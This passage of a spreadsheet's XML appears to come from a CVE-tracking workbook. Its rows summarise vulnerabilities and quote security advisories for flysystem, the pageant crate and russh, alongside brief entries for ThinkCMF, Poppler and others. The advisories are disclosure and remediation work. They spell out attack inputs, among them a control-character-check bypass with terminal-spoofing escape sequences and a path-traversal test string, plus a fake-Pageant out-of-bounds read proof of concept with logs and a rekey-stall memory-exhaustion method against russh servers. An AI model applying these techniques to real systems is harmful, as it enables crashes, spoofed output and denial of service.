          <t>A security vulnerability has been detected in Naichen ThinkCMF up to 8.0.7. Affected by this issue is the function MailController::templatePut of the file cmf-api/src/admin/controller/MailController.php of the component Email Template. The manipulation leads to improper neutralization of special elements used in a template engine. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T857" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102771</t>
        </is>
      </c>
    </row>
    <row r="858">
      <c r="A858" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B858" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (2.7 → 2.0)</t>
        </is>
      </c>
      <c r="C858" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102844</t>
        </is>
      </c>
      <c r="D858" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E858" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F858" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G858" s="5" t="inlineStr"/>
      <c r="H858" s="5" t="inlineStr"/>
      <c r="I858" s="5" t="inlineStr"/>
      <c r="J858" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K858" s="5" t="inlineStr"/>
      <c r="L858" s="5" t="inlineStr"/>
      <c r="M858" s="5" t="inlineStr"/>
      <c r="N858" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O858" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P858" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q858" s="5" t="inlineStr"/>
      <c r="R858" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="S858" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in gedelumbung HospitalManagement up to c2d45543789a3887067d3915f69d44cfc2cf76a8. This vulnerability affects the function detail of the file application/modules/admin/controllers/laporan_data_pasien.php. Executing a manipulation of the argument id_param can lead to authorization bypass. The attack can be launched remotely. The exploit has been made available to the public and could be used for attacks. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T858" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102844</t>
        </is>
      </c>
    </row>
    <row r="859">
      <c r="A859" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B859" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.7 → 2.0)</t>
        </is>
      </c>
      <c r="C859" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102912</t>
        </is>
      </c>
      <c r="D859" s="5" t="n">
        <v>2</v>
      </c>
      <c r="E859" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F859" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G859" s="5" t="inlineStr"/>
      <c r="H859" s="5" t="inlineStr"/>
      <c r="I859" s="5" t="inlineStr"/>
      <c r="J859" s="5" t="inlineStr"/>
      <c r="K859" s="5" t="inlineStr"/>
      <c r="L859" s="5" t="inlineStr"/>
      <c r="M859" s="5" t="inlineStr"/>
      <c r="N859" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O859" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P859" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q859" s="5" t="inlineStr"/>
      <c r="R859" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S859" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in SourceCodester Online Leave Management System 1.0. This issue affects some unknown processing of the file /admin/?page=reports. The manipulation of the argument date_start/date_end leads to sql injection. Remote exploitation of the attack is possible. The exploit is publicly available and might be used.</t>
        </is>
      </c>
      <c r="T859" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102912</t>
        </is>
      </c>
    </row>
    <row r="860">
      <c r="A860" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B860" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (3.3 → 1.9)</t>
        </is>
      </c>
      <c r="C860" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102621</t>
        </is>
      </c>
      <c r="D860" s="5" t="n">
        <v>1.9</v>
      </c>
      <c r="E860" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F860" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G860" s="5" t="inlineStr"/>
      <c r="H860" s="5" t="inlineStr"/>
      <c r="I860" s="5" t="inlineStr"/>
      <c r="J860" s="5" t="inlineStr"/>
      <c r="K860" s="5" t="inlineStr"/>
      <c r="L860" s="5" t="inlineStr"/>
      <c r="M860" s="5" t="inlineStr"/>
      <c r="N860" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O860" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P860" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q860" s="5" t="inlineStr"/>
      <c r="R860" s="5" t="inlineStr">
        <is>
          <t>CWE-189, CWE-190</t>
        </is>
      </c>
      <c r="S860" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Freedesktop Poppler up to 26.08.0. Affected is the function SplashClip::clipToPath of the file splash/SplashClip.cc. Such manipulation leads to integer overflow. The attack can only be performed from a local environment. The exploit is publicly available and might be used. Upgrading to version 26.09.0 is able to address this issue. The name of the patch is 323c91036d99926a8b90dc14329f7b40aece22f8. It is recommended to upgrade the affected component.</t>
        </is>
      </c>
      <c r="T860" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102621</t>
        </is>
      </c>
    </row>
    <row r="861">
      <c r="A861" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B861" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed</t>
        </is>
      </c>
      <c r="C861" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102601</t>
        </is>
      </c>
      <c r="D861" s="5" t="inlineStr"/>
      <c r="E861" s="5" t="inlineStr"/>
      <c r="F861" s="5" t="inlineStr"/>
      <c r="G861" s="5" t="inlineStr"/>
      <c r="H861" s="5" t="inlineStr"/>
      <c r="I861" s="5" t="inlineStr"/>
      <c r="J861" s="5" t="inlineStr"/>
      <c r="K861" s="5" t="inlineStr"/>
      <c r="L861" s="5" t="inlineStr">
        <is>
          <t>composer:league/flysystem</t>
        </is>
      </c>
      <c r="M861" s="5" t="inlineStr">
        <is>
          <t>3.35.3</t>
        </is>
      </c>
      <c r="N861" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O861" s="5" t="inlineStr"/>
      <c r="P861" s="5" t="inlineStr"/>
      <c r="Q861" s="5" t="inlineStr"/>
      <c r="R861" s="5" t="inlineStr">
        <is>
          <t>CWE-150</t>
        </is>
      </c>
      <c r="S861" s="5" t="inlineStr">
        <is>
          <t>## Related public issue (context, not a duplicate)
Closed issue #1429 ("Handle non-UTF-8 paths", 2024-03-24) raised exactly this general concern and
even suggested detection via `preg_match('//u', $path) !== 1` -- note the reporter's suggested check
explicitly compares `!== 1`, which *would* correctly treat PCRE's `false` return as "reject." The
maintainer's reply pointed to the `PathNormalizer` interface as the place to implement this. The
control-character check that ended up shipping in `WhitespacePathNormalizer`
(`if (preg_match('#\p{C}+#u', $unixPath))`) addresses the general concern but does **not** use the
`!== 1`-style comparison the original issue suggested -- it uses a bare truthy check, which is exactly
the gap this report demonstrates. So this is not a duplicate of #1429; it's a concrete bypass
surviving in the fix that issue's concern led to.
## Vulnerability Details
**File**: `src/WhitespacePathNormalizer.php`, lines 22-28 (`normalizePath()`) -- the **default**
`PathNormalizer` used by `Filesystem` for every adapter (Local, FTP, SFTP, S3, AsyncAwsS3, Azure, GCS,
ZipArchive, GridFS, InMemory) unless the application supplies a custom one.
### Root Cause
```php
public function normalizePath(string $path): string
{
    $unixPath = str_replace('\\', '/', $path);
    if (preg_match('#\p{C}+#u', $unixPath)) {
        throw CorruptedPathDetected::forPath($path);
    }
    ...
```
`preg_match()` returns `false` (a PHP engine error) rather than `0` when the subject string is not
valid UTF-8 and the pattern uses the `/u` modifier -- PCRE can't even attempt the match. `false` and
`0` are both falsy in PHP, and `if (preg_match(...))` does not distinguish them. So a path containing
**any single invalid UTF-8 byte anywhere in the string** makes `preg_match()` fail with a "Malformed
UTF-8 characters" engine error, the `if` evaluates false, and `CorruptedPathDetected` is silently **not**
thrown -- even when the same string also contains literal control characters this exact check exists
to catch.
the identical payload IS correctly rejected once it's valid UTF-8:
```php
$n-&gt;normalizePath("foo\x1bbar");         // valid UTF-8, contains ESC -&gt; throws CorruptedPathDetected (correct)
$n-&gt;normalizePath("foo\x80\x1bbar");    // 0x80 = invalid lone UTF-8 continuation byte -&gt; NOT thrown (bypass)
```
The path-traversal protection is **unaffected** -- it's exact byte-string comparison on
`/`-delimited segments, independent of UTF-8 validity:
```php
$n-&gt;normalizePath("\x80/../../etc/passwd");   // still throws PathTraversalDetected
```
### Recommended Fix
```php
public function normalizePath(string $path): string
{
    $unixPath = str_replace('\\', '/', $path);
    $matched = preg_match('#\p{C}+#u', $unixPath);
    if ($matched !== 0) {
        // $matched === false means malformed UTF-8 -- must also be treated as corrupted,
        // not silently allowed through.
        throw CorruptedPathDetected::forPath($path);
    }
    ...
```
### Verification
Dynamically confirmed on `league/flysystem` HEAD `6837e1d` / tag `3.35.2`, PHP 8.4.22 CLI, end-to-end
through `LocalFilesystemAdapter`:
```
[1] write() succeeded -- normalizer did NOT reject the path.
[2] Actual bytes on disk: ...801b5b386d6e6f726d616c2d6c6f6f6b696e672d66696c652e7478741b5b306d...
[3] Filesystem::listContents() path contains raw ESC (0x1b): YES
[4] Raw terminal output (via `cat -v`): M-^@^[[8mnormal-looking-file.txt^[[0m^[[2K^[[1Aurgent-invoice.pdf</t>
        </is>
      </c>
      <c r="T861" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102601</t>
        </is>
      </c>
    </row>
    <row r="862">
      <c r="A862" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B862" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C862" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102820</t>
        </is>
      </c>
      <c r="D862" s="5" t="inlineStr"/>
      <c r="E862" s="5" t="inlineStr"/>
      <c r="F862" s="5" t="inlineStr"/>
      <c r="G862" s="5" t="inlineStr"/>
      <c r="H862" s="5" t="inlineStr"/>
      <c r="I862" s="5" t="inlineStr"/>
      <c r="J862" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K862" s="5" t="inlineStr"/>
      <c r="L862" s="5" t="inlineStr">
        <is>
          <t>rust:pageant</t>
        </is>
      </c>
      <c r="M862" s="5" t="inlineStr">
        <is>
          <t>0.2.3</t>
        </is>
      </c>
      <c r="N862" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O862" s="5" t="inlineStr"/>
      <c r="P862" s="5" t="inlineStr"/>
      <c r="Q862" s="5" t="inlineStr"/>
      <c r="R862" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-789</t>
        </is>
      </c>
      <c r="S862" s="5" t="inlineStr">
        <is>
          <t>## Summary
`MemoryMap::read` in the `pageant` crate (part of the russh workspace, used by
russh's SSH-agent client on Windows via `AgentClient::connect_pageant`) copies a
**peer-controlled** number of bytes out of an 8192-byte shared-memory view with
**no bounds check** — unlike the sibling `MemoryMap::write`, which correctly
rejects oversize access with `Error::Overflow`. The byte count comes straight
from a `u32` length prefix that the responding "Pageant" process writes into the
shared mapping. A malicious local process that answers as the Pageant agent can
therefore cause:
- an **out-of-bounds read** past the 8 KiB view (access violation → process
  crash; or disclosure of adjacent process memory if the following page is
  committed)
- an allocation of up to **~4 GiB** from a single `u32` (`vec![0; n]`).
This was reproduced **end-to-end against the real, unmodified `pageant` crate**
(not a model) on `x86_64-pc-windows-gnu` under Wine; see "Proof of concept".
## Impact
- **Availability / DoS (reliable).** `MemoryMap::read(size)` walks off the end of
  the 8192-byte view and faults on the next, unmapped page — an
  `EXCEPTION_ACCESS_VIOLATION` that crashes the russh SSH client. Independently,
  a `size` near `u32::MAX` drives a ~4 GiB `vec![0; n]` before any copy.
- **Confidentiality (conditional).** If memory immediately after the mapped view
  happens to be committed, `read` returns those adjacent bytes to russh as the
  "agent response", which russh then parses as agent identities/signatures. This
  arm depends on process memory layout, so it is opportunistic; the crash/alloc
  is the deterministic outcome.
- **Trust boundary.** russh locates the agent with
  `FindWindowW("Pageant", "Pageant")` and passes the shared-mapping name inside
  the `WM_COPYDATA` `COPYDATASTRUCT`. **Any** local process can register a window
  of class + title `"Pageant"`, receive that name, open the same mapping, and
  write a hostile `size`. So an unprivileged local process impersonating Pageant
  can attack every russh-based SSH client that uses the Pageant agent.
## Affected component
- `pageant/src/wmmessage.rs`
  - `MemoryMap::read` (`:160-171`) — no bound (contrast `MemoryMap::write`
    `:139-158`, which returns `Error::Overflow` when `pos + len &gt; length`).
  - `query_pageant_direct` (`:199-237`) — reads a 4-byte `u32` size from the
    shared mapping (`:233`) and calls `map.read(size)` (`:234`) with no check
    against `_AGENT_MAX_MSGLEN` (8192).
- Reached from russh via `AgentClient::connect_pageant` → `PageantStream` →
  `query_pageant_direct`.
Platform: **Windows only** (`cfg(windows)`), local attacker. Verified against
the `pageant` crate **v0.2.2** as shipped in russh **v0.63.1** (`d3ae702`, the
latest release). `read` has never had a bound in any revision
(`git log -p -- pageant/src/wmmessage.rs`).
## Details
```rust
fn write(&amp;mut self, data: &amp;[u8]) -&gt; Result&lt;(), Error&gt; {
    if self.pos + data.len() &gt; self.length {      // :140  BOUND PRESENT
        return Err(Error::Overflow);
    }
    ... copy_nonoverlapping(&amp;data[0], view+pos, data.len()) ...
}
fn read(&amp;mut self, n: usize) -&gt; Vec&lt;u8&gt; {         // :160  NO BOUND
    let out = vec![0; n];                         // n up to 0xFFFF_FFFF (CWE-789)
    unsafe {
        std::ptr::copy_nonoverlapping(
            self.view.Value.add(self.pos) as *const u8,   // view is length==8192
            out.as_ptr() as *mut u8,
            n,                                    // reads n bytes, may run past the view (CWE-125)
        );
    }
    self.pos += n;
    out
}
```
`query_pageant_direct` creates the mapping at `_AGENT_MAX_MSGLEN = 8192`, writes
the request, sends the `WM_COPYDATA`, then reads the response the peer wrote:
```rust
map.seek(0);
let mut buf = map.read(4);
let size = u32::from_be_bytes([buf[0],buf[1],buf[2],buf[3]]) as usize; // :233 peer-controlled
buf.extend(map.read(size));                                            // :234 unbounded
```
Nothing checks `4 + size &lt;= 8192`, so `map.read(size)` runs past the 8 KiB view.
## Proof of concept
Because the bug is Windows-only (`WM_COPYDATA` + `MapViewOfFile`), the PoC is a
Windows cross-build (`x86_64-pc-windows-gnu`) driven under **Wine**, entirely
inside a Linux container. It exercises the **real, unmodified** crate: the PoC
takes a path dependency on `pageant` and calls
`pageant::wmmessage::query_pageant_direct`, exactly what
`AgentClient::connect_pageant` uses. A second thread impersonates Pageant
(registers the window class + title `"Pageant"`) and, on `WM_COPYDATA`, opens
the shared mapping russh created and writes an attacker-chosen 4-byte
big-endian length.
`poc/run.sh` builds and runs it. Full log in `results/e2e-wine-run.log`:
```
======== LEG 1 — ATTACK: fake agent reports length 0x00080000 (512 KiB) &gt;&gt; 8192-byte view ========
[attacker] impersonating Pageant window is up (class+title "Pageant")
[victim ] calling pageant::wmmessage::query_pageant_direct() over the 8192-byte view ...
[attacker] WM_COPYDATA received; shared mapping = "PageantRequestpoc"
[attacker] wrote hostile response length = 524288 (0x00080000) into the 8192-byte view
wine: Unhandled page fault on read access to 0000000002092000 at address 00000002282CFDC4 ...
WINE-EXIT=5
======== LEG 2 — CONTROL: fake agent reports length 0x00000010 (16 B), in-bounds ========
[victim ] returned 20 bytes — request+response fit inside the 8192-byte view (in-bounds control); no fault
WINE-EXIT=0
```
- **LEG 1 (attack)**: an oversized `size` makes `MemoryMap::read` read past the
  8192-byte view; Wine reports an unhandled page fault at a page-aligned address
  (`0x…2092000`) — the out-of-bounds read as an access violation (crash). Exit
  code 5 = `STATUS_ACCESS_VIOLATION`.
- **LEG 2 (control)**: an in-bounds `size` returns cleanly. Same code path; the
  only difference is whether the peer's length exceeds the view — isolating the
  missing bound.
**Fix validation.** With `patch/pageant-read-bound.patch` applied and the PoC
rebuilt against the patched crate, the identical attack input is rejected
(`results/patched-wine-run.log`):
```
[attacker] wrote hostile response length = 524288 (0x00080000) into the 8192-byte view
[victim ] query_pageant_direct error: Overflow
WINE-EXIT=0
```
No fault; the read is refused at the bound, exactly as `write` already refuses
oversize writes. (A pure-logic Linux model of the same control flow is also
included as `poc/pageant_read_oob_demo.rs` / `results/logic-demo-run.log`.)
## Remediation
Mirror `write`'s guard in `read` and validate the response length before
allocating/copying. `patch/pageant-read-bound.patch`:
- `MemoryMap::read(n)` returns `Result&lt;Vec&lt;u8&gt;, Error&gt;` and returns
  `Error::Overflow` when `self.pos + n &gt; self.length`;
- `query_pageant_direct` propagates that `Result` and additionally rejects
  `size &gt; _AGENT_MAX_MSGLEN - 4` before `map.read(size)`.</t>
        </is>
      </c>
      <c r="T862" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102820</t>
        </is>
      </c>
    </row>
    <row r="863">
      <c r="A863" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B863" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C863" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102821</t>
        </is>
      </c>
      <c r="D863" s="5" t="inlineStr"/>
      <c r="E863" s="5" t="inlineStr"/>
      <c r="F863" s="5" t="inlineStr"/>
      <c r="G863" s="5" t="inlineStr"/>
      <c r="H863" s="5" t="inlineStr"/>
      <c r="I863" s="5" t="inlineStr"/>
      <c r="J863" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K863" s="5" t="inlineStr"/>
      <c r="L863" s="5" t="inlineStr">
        <is>
          <t>rust:russh</t>
        </is>
      </c>
      <c r="M863" s="5" t="inlineStr">
        <is>
          <t>0.63.2</t>
        </is>
      </c>
      <c r="N863" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O863" s="5" t="inlineStr"/>
      <c r="P863" s="5" t="inlineStr"/>
      <c r="Q863" s="5" t="inlineStr"/>
      <c r="R863" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="S863" s="5" t="inlineStr">
        <is>
          <t>## Summary
A russh **server** can be driven to unbounded heap growth (process OOM / kill) by
a peer that speaks only standard SSH messages, in the **default configuration**.
The peer starts a key re-exchange (sends `SSH_MSG_KEXINIT`) but never sends the
follow-up `SSH_MSG_KEX_ECDH_INIT`, leaving the server's kex state machine in
`SessionKexState::InProgress` **indefinitely**. While a rekey is in progress the
server's three message-drain paths are all gated off (`if !self.kex.active()`),
but the network-read path stays active, so every `SSH_MSG_CHANNEL_OPEN` the peer
sends is processed inline and appends one reply to an **unbounded** internal
queue (`priority_receiver`, an `UnboundedReceiver`) that is not dequeued until
the rekey completes. Because the peer decides whether the rekey ever completes,
the queue — and the server's memory — grows without bound.
This is reproducible end-to-end against a real russh server over a real
encrypted transport; see "Proof of concept". A one-line negative control (same
flood, no rekey) keeps memory flat, isolating the rekey window as the sole
trigger.
## Impact
- **Availability / DoS.** Server RSS climbs at roughly 3.3 KB per
  `CHANNEL_OPEN`, driven entirely by the peer, until the process is OOM-killed.
  In the reproduction one connection pushed the server from ~4 MB to **2.57 GB**
  (and past **4.8 GB** against the stock `echoserver` example) and it was still
  climbing when the flood was stopped.
- **Reached with standard messages, no special configuration.** Any handler is
  affected, including one that rejects every channel (the reply enqueued on
  rejection is exactly what accumulates). There is no per-connection cap on
  in-flight channel opens or on the queue, and the queue's sender has no
  backpressure.
- The peer keeps the connection alive simply by continuing to send, so the
  inactivity timer never fires.
## Affected component
- `russh/src/server/session.rs` — `Session::run` `tokio::select!` loop. The
  network-read arm is ungated; the three drain paths are gated on
  `!self.kex.active()`.
- `russh/src/server/mod.rs` — `reply()` routes a non-kex message received during
  a rekey straight to `server_read_encrypted` (inline processing).
- `russh/src/lib_inner.rs` — `ChannelOpenHandleInner`'s `accept`/`reject`/`Drop`
  all `send` a reply on an `UnboundedSender`.
Verified on **v0.63.1** (commit `d3ae702`), which is the latest release. The
gating logic predates it.
## Details
`Session::run` (`russh/src/server/session.rs:631`) drives a `tokio::select!`
(`:713`). Three of its message-drain sites are gated on `!self.kex.active()`:
- the pre-`select!` batch drain of `priority_receiver`/`receiver`
  (`session.rs:680`),
- the `priority_receiver.recv()` arm (`session.rs:762`),
- the `receiver.recv()` arm (`session.rs:770`, which also holds the only other
  `priority_receiver` drain at `:777`).
The fourth arm, `r = &amp;mut reading` (`session.rs:714`), is **ungated**: it reads
and processes one incoming packet every loop iteration regardless of rekey
state, calling `reply()` (`server/mod.rs:1128`).
During a **rekey**, `session.common.encrypted.is_some()`, so the strict-kex
message-ordering guard (`server/mod.rs:1143`, which is additionally gated on
`encrypted.is_none()`) does **not** apply. A non-kex message therefore falls
through `reply()` to `session.server_read_encrypted(handler, pkt)`
(`server/mod.rs:1232`) and is handled inline. For `SSH_MSG_CHANNEL_OPEN` this
reaches the channel-open handling, which hands the application a
`ChannelOpenHandle`.
Whether the handler accepts or (the trait default) rejects, the handle's
`accept` / `reject` / `Drop` all `send` a `Msg::ChannelOpenReply` on an
`UnboundedSender` (`russh/src/lib_inner.rs:560-603`; `Drop` sends
`AdministrativelyProhibited` at `:594-603`). That sender feeds
`priority_receiver`, declared `UnboundedReceiver&lt;Msg&gt;` (`session.rs:23`) and
created with `tokio::sync::mpsc::unbounded_channel()` (`session.rs:1522`). Its
only drain sites are the three arms gated off during the rekey. So each
`CHANNEL_OPEN` processed during the rekey window appends one reply (carrying a
`PendingChannelOpen` = channel params + mpsc `ChannelRef` + ids, a few KB
retained in practice) to a queue that is never dequeued.
Two facts make this unbounded and remote:
1. The server enters `InProgress` the moment it receives the peer's `KEXINIT`
   (`server/mod.rs:1153-1158`, `begin_rekey`) and only leaves it upon receiving
   the peer's `KEX_ECDH_INIT`. **The peer decides** whether to ever send that,
   so the window is attacker-held.
2. There is no per-connection cap on channels or on the priority queue, and the
   sender is unbounded (no backpressure).
### Root cause
The intended design was to *buffer* packets received during a rekey and replay
them afterwards: the fields `pending_reads: Vec&lt;Vec&lt;u8&gt;&gt;` and `pending_len: u32`
(`session.rs:26-27`) exist and are **drained** at kex completion
(`server/mod.rs:1194-1198`). But nothing ever **pushes** to `pending_reads` or
increments `pending_len` (they are dead — confirmed by grep across
`russh/src/`). Instead of being buffered, channel messages received during a
rekey are processed inline, and their replies pile up in the unbounded
`priority_receiver`. The missing piece is a bound on — or bounded deferral of —
channel processing while `kex.active()`.
## Proof of concept
Everything runs inside a container; nothing touches the host.
**Lab.** `poc/Dockerfile` builds `russh-lab:head` from Eugeny/russh @ `d3ae702`
(v0.63.1), default features (rust 1.91). A raw-SSH-client PoC
(`poc/poc_rekey_dos.rs`) implements curve25519-sha256 / ssh-ed25519 /
aes256-ctr / hmac-sha2-256 by hand, completes the handshake and a `publickey`
auth, then:
1. sends `SSH_MSG_KEXINIT` (server enters `kex.active()`),
2. **never** sends `KEX_ECDH_INIT` (rekey stalls, attacker-held),
3. floods `SSH_MSG_CHANNEL_OPEN`.
A minimal server (`poc/poc_server.rs`) uses the **trait-default**
`channel_open_session` (which rejects by dropping the handle), so the measured
growth is purely the undrained priority queue, not accepted-channel state.
`poc/run.sh` runs the attack leg and an identical **negative control** with no
rekey. Fresh run inside the lab, `N = 800,000` opens
(`results/rerun-2026-08-29.log`):
```
=== ATTACK (rekey stall) === (poc_server baseline_RSS=4208KB, N=800000)
  t=2s  server_RSS=667760KB
  t=4s  server_RSS=1599600KB
  t=6s  server_RSS=2556016KB
  t=8s  server_RSS=2566256KB   (flood done; memory retained)
=== CONTROL (no rekey) === (poc_server baseline_RSS=4208KB, N=800000)
  t=2s..t=12s  server_RSS=4208KB   (flat throughout)
```
- **ATTACK**: RSS `4,208 KB → 2,566,256 KB` (~2.57 GB) and retained after the
  flood ends — ~3.3 KB per `CHANNEL_OPEN`, attacker-driven. (An earlier canonical
  run reached 2.7 GB at 800k opens, and past 4.8 GB against the stock
  `echoserver` example at 1.5 M opens — see `results/canonical-run.log`.)
- **CONTROL**: RSS flat at `4,208 KB`. Without the rekey window the replies are
  drained normally; TCP backpressure (the client never reads the failure
  replies) even throttles the flood.
The control isolates the rekey window as the sole trigger. Both legs exercise
the real server entry point (`Session::run` → `reply` → `server_read_encrypted`)
over a real encrypted transport.
Reproduce: `C=russh-lab N=800000 ./poc/run.sh` (see `poc/POC-README.md`).
## Remediation
The priority queue carries locally generated channel-open replies, which are
non-kex messages the server **must not send** during a rekey anyway (RFC 4253
§7.1). So the fix is to bound how much channel work is done during a rekey, not
to drain the queue mid-rekey. Any of:
- **(recommended, minimal)** cap the number of non-kex messages processed while a
  rekey is in progress and disconnect a peer that exceeds it. A stalled/abusive
  rekey is then torn down after a small constant instead of growing memory
  without bound. See `patch/rekey-message-cap.patch` (a ~10-line change local to
  `Session::run`, validated in the lab — the attack leg is disconnected after the
  cap and RSS stays flat; a normal rekey, which completes in one round trip, is
  unaffected).
- bound / deferred-buffer channel messages during a rekey using the existing
  (currently dead) `pending_reads`/`pending_len` machinery, with a hard cap.
- bound the number of in-flight channel opens per connection and reject beyond it.
OpenSSH does not service new channels mid-kex; matching that intent closes the
whole family.</t>
        </is>
      </c>
      <c r="T863" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102821</t>
        </is>
      </c>
    </row>
    <row r="864">
      <c r="A864" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B864" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C864" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102822</t>
        </is>
      </c>
      <c r="D864" s="5" t="inlineStr"/>
      <c r="E864" s="5" t="inlineStr"/>
      <c r="F864" s="5" t="inlineStr"/>
      <c r="G864" s="5" t="inlineStr"/>
      <c r="H864" s="5" t="inlineStr"/>
      <c r="I864" s="5" t="inlineStr"/>
      <c r="J864" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K864" s="5" t="inlineStr"/>
      <c r="L864" s="5" t="inlineStr">
        <is>
          <t>rust:russh</t>
        </is>
      </c>
      <c r="M864" s="5" t="inlineStr">
        <is>
          <t>0.63.1</t>
        </is>
      </c>
      <c r="N864" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O864" s="5" t="inlineStr"/>
      <c r="P864" s="5" t="inlineStr"/>
      <c r="Q864" s="5" t="inlineStr"/>
      <c r="R864" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="S864" s="5" t="inlineStr">
        <is>
          <t>### Summary
`SshBlockCipher` implementations (AES-CBC, AES-CTR, 3DES-CBC, etc.) report `needs_mac() == true`, meaning they are documented/intended to always be paired with a separate integrity MAC. However, key-exchange negotiation only checks `needs_mac()` inside the *fallback* branch of MAC algorithm selection (used when no common MAC algorithm exists). If both peers' preferred MAC lists simply contain `none` and it is successfully negotiated through the normal selection path, nothing rejects pairing `none` with a cipher that requires a MAC. Once negotiated, a single crafted packet from either peer causes `cipher::read()` to shrink an already-allocated buffer below the number of bytes it is about to index, causing a Rust slice-index-out-of-range panic and killing that connection's task.
### Details
In `russh/src/cipher/mod.rs`, `read()` for a block cipher:
1. Reads `packet_length_to_read_for_block_length()` bytes up front (16 bytes for any `SshBlockCipher`) into `buffer.buffer`.
2. Decrypts the first block to recover the plaintext packet-length field `len`.
3. Computes `buffer.len = len + cipher.tag_len()`.
4. Calls `buffer.buffer.resize(buffer.len + 4, 0)`.
5. Immediately indexes `buffer.buffer[16..]` (via the constant used for the first block read) to continue decrypting/reading the rest of the packet.
When the negotiated MAC is `none`, `tag_len() == 0`. If the attacker (or a MITM holding the session key, or simply the accepting peer testing a hostile client) sends a packet whose *decrypted* length field is `0`, then `buffer.len = 0` and `resize(0 + 4, 0)` **shrinks** the buffer that was already grown to 16 bytes in step 1 down to 4 bytes. The subsequent slice operation `buffer.buffer[16..]` then panics with `range start index 16 out of range for slice of length 4`.
The file already defines a `MINIMUM_PACKET_LEN` constant, but it is only consulted on the *write*/padding side, never on the read path — so nothing prevents an incoming packet from declaring a length shorter than the bytes already buffered.
